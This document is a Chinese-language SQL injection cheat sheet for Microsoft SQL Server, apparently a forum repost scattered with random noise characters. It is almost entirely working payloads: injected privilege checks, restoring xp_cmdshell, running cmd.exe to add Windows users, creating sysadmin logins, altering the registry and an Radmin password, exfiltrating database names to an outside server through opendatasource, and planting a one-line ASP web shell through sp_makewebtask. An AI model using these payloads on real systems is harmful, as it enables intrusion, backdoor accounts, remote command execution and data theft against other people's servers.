阿Ｄ常用的一些注入命令

admin

阿Ｄ常用的一些注入命令
1 O+ `; c( a- E" j: @+ ^% r//看看是什么权限的
' D# w$ d0 _2 b! fand 1=(Select IS_MEMBER('db_owner'))
+ v# z1 I  r: Q2 a# |  OAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
1 R' B( F) r) O# d# B+ @, uand 1= (Select HAS_DBACCESS('master'))
/ `. C9 R! }0 y5 v6 J* MAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
) B, |/ y+ x2 a; P

# U+ \4 v. n# h0 K4 M9 Q3 i  y# r数字类型
and char(124)%2Buser%2Bchar(124)=0

: T4 _3 {% _) j  U6 P字符类型
, Y9 r! ]/ |' s8 }. J' and char(124)%2Buser%2Bchar(124)=0 and ''='
% |2 r! ]3 Q* ~  ]+ T
搜索类型
: Y; s2 R6 a' p  T- V3 X' and char(124)%2Buser%2Bchar(124)=0 and '%'='
0 |# W0 E/ e/ h( d% E& H
: `! W# h# F9 ~# H; w5 ~( `" r6 Q: c4 }8 a3 l爆用户名
% R  M6 Y4 U( r0 M( G& L0 pand user>0
+ w2 Y( ?/ I5 V" M9 ~3 l' and user>0 and ''='
* A  H1 D! \8 ]  F9 r7 Q
; J% Q0 G* x$ M& G/ D检测是否为SA权限
7 `% e: F( H. J* M7 P2 \+ Zand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
. E6 A% Y- B5 H, l. [& d7 ~4 n$ oAnd char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

4 E6 l) g; z+ ^. A3 w1 v- T: l检测是不是MSSQL数据库
and exists (select * from sysobjects);--

# L* u2 f! H+ z, e/ Y4 r, i1 @5 w检测是否支持多行
* u# H. p' e6 C" a;declare @d int;--
/ H3 j  W. j" f  ]+ `9 B3 M, a
9 ?4 _5 |& p; `# ?4 ^8 |. v0 x' l恢复 xp_cmdshell
0 N" W3 U% p3 I7 L1 Q;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
' J! a' i0 R  z
( l$ x9 U6 Y1 Z
& i0 J5 v0 l0 G' S3 P4 Dselect * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
//      执行命令
. h  @" c. c, g( I' V+ ?; E; b//-----------------------
首先开启沙盘模式：
, s0 G2 m' _0 r& wexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
' j# k9 l( u1 D2 }$ e9 d; d# ]select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
, ~- U+ K1 z+ q( y;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
% e/ c4 g7 J- s! Q( Q
* X% s  F5 Y0 E' C8 T* |- V0 VEXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'

判断xp_cmdshell扩展存储过程是否存在：
3 \' c6 X1 S4 b% ahttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

+ K/ L- S; h- ~1 Q3 o- r; C" X写注册表
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

% t6 U% ~& V$ x7 g+ W* A  [REG_SZ

* b9 d. Z: Z: Z9 X; `读注册表
: e: W+ R; c8 Y* S( q4 [2 Kexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

' Y: F3 Z  @& _: ]读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1

6 Y6 y; i# k! R$ \& [8 Q
数据库备份
backup database pubs to disk = 'c:\123.bak'

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
4 w1 f( P( Z  I) P

# x1 g4 Z, W& u- F! L% p
更改sa口令方法：用sql综合利用工具连接后，执行命令：
exec sp_password NULL,'新密码','sa'

) U$ M5 @2 c3 y5 B添加和删除一个SA权限的用户test：
1 s  A" t- i( B$ q) u- Eexec master.dbo.sp_addlogin test,ptlove
2 j" z# S/ q/ }1 c  Y5 Y1 Y2 Q; J' {( [exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过过程xp_cmdshell的语句:
8 w  X# {" _* Z6 k/ Zexec sp_dropextendedproc 'xp_cmdshell'
+ R/ ?9 Y0 O9 w8 ~" Z$ L6 F: m1 ]
. Y" s0 x4 N' S添加扩展存储过过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
6 j/ T9 T3 s8 ~3 T$ I4 l# |
* z6 b7 a/ U+ t2 E9 t8 I7 V& t: Y- I
& v6 z: W9 R- B! X6 M, [1 A" R停掉或激活某个服务。

, H2 {6 K8 i2 f, Uexec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

/ P# d* W! X- o- U8 Pdbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

/ c+ {' R5 u4 @* \4 `8 q. kdbo.xp_makecab

3 J' }7 ]  r! z将目标多个档案压缩到某个目标档案之内。
: O- k7 j8 n, j2 s+ e+ H( I, A所有要压缩的档案都可以接在参数列的最后方，以逗号隔开。
# w6 _4 c- m% W; }6 `% A, Q& j
" q& w- X6 L' _- T( g9 H0 `dbo.xp_makecab
'c:\test.cab','mszip',1,
* t- b7 `0 D; `, N; b9 _; A* R$ E'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

/ r& `9 F# j3 r0 g+ s8 W8 Oxp_terminate_process
6 s1 D+ p+ D1 t0 p) |8 G1 J$ ]* h
停掉某个执行中的程序，但赋予的参数是 Process ID。
3 i- U. q, G. K  E利用”工作管理员”，透过选单「检视」-「选择字段」勾选 pid，就可以看到每个执行程序的 Process ID
& K$ r1 h3 [( P5 U0 R8 [
xp_terminate_process 2484

  Q5 q1 X7 e! |' T1 c( q& \xp_unpackcab

解开压缩档。

  u+ n1 n# a* U' v6 e: ?/ nxp_unpackcab 'c:\test.cab','c:\temp',1
0 H- g2 ]% H6 G/ f8 ]
: \) w4 S/ k8 `6 g+ d8 }) [+ M
某机，安装了radmin，密码被修改了，regedit.exe不知道被删除了还是被改名了，net.exe不存在，没有办法使用regedit /e 导入注册文件，但是mssql是sa权限，使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234

create database lcx;
" H" c5 ~+ l/ Y8 @: U+ l; T, HCreate TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases

% F$ R0 U& k$ \' _6 H2 [  J# s# d
//在Master中创建表，看看权限怎样
* n8 H5 o& E) D9 m' J& oCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
! U0 l' `/ ]; [0 v
4 p9 ^! X- N. c5 ]( y1 ]" n' e用 sp_makewebtask直接在web目录里写入一句话马：
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
3 D1 L+ F% |7 m. P
- W& ~% S# a( I- \1 j//更新表内容
/ o; i# y$ F2 d6 z' cUpdate films SET kind = 'Dramatic' Where id = 123
) X/ P6 G  l- ?3 c
//删除内容
delete from table_name where Stockid = 3